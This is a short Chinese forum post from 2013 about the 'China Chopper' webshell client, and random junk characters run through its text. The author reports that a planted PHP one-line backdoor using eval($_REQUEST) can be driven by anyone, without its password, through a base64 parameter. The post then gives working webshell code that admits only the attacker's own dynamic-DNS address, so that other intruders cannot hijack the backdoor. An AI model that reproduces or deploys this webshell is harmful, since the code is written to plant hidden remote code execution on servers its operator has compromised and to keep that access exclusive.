今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
' Q+ X, [/ K3 Q7 W1 W5 W" Z, v" R/ m8 Q- l& E
就算你设置了密码,使用了eval($_REQUEST['moyo']);
! l$ _; [2 t- E1 K1 s' O# E" I
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
9 ?* C q! |& E- g0 W: p0 d) u) K" ~& P# s( T
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));) J( ^ C/ P9 m; o/ g
1 z7 M; ^" W) E3 S1 g8 X直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了% A& J; T; l: w. C6 |: z2 a
* ~4 p9 v# c4 d" b, K0 z4 R$ m; j6 [+ a不知道是设计缺陷还是故意留的后门
: E, k* l! w& \- O) C3 ^, p$ D
) i+ z) R+ r0 P6 k- C3 c/ O# u如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
1 y9 D6 c% X4 l& j# d
2 ]6 _/ `5 y* z) ~4 M5 k4 k, @本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
# g8 D; K/ h" J% q) C; d
' r8 c B" j6 U, E3 P' H5 d然后一句话后门这样写
2 f3 H9 p# g6 ~* ]6 L( b9 t6 E
1 S5 Y, h8 o3 f3 j. G `* u& y2 Y) h) P<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>" P# R+ x4 |2 d
这样就可以让一句话后门只允许自己的电脑连接了+ d D% w; X. H
& M) k- p* y1 d$ ]/ I
|
发表于 2013-7-26 12:45:48
收藏
支持
反对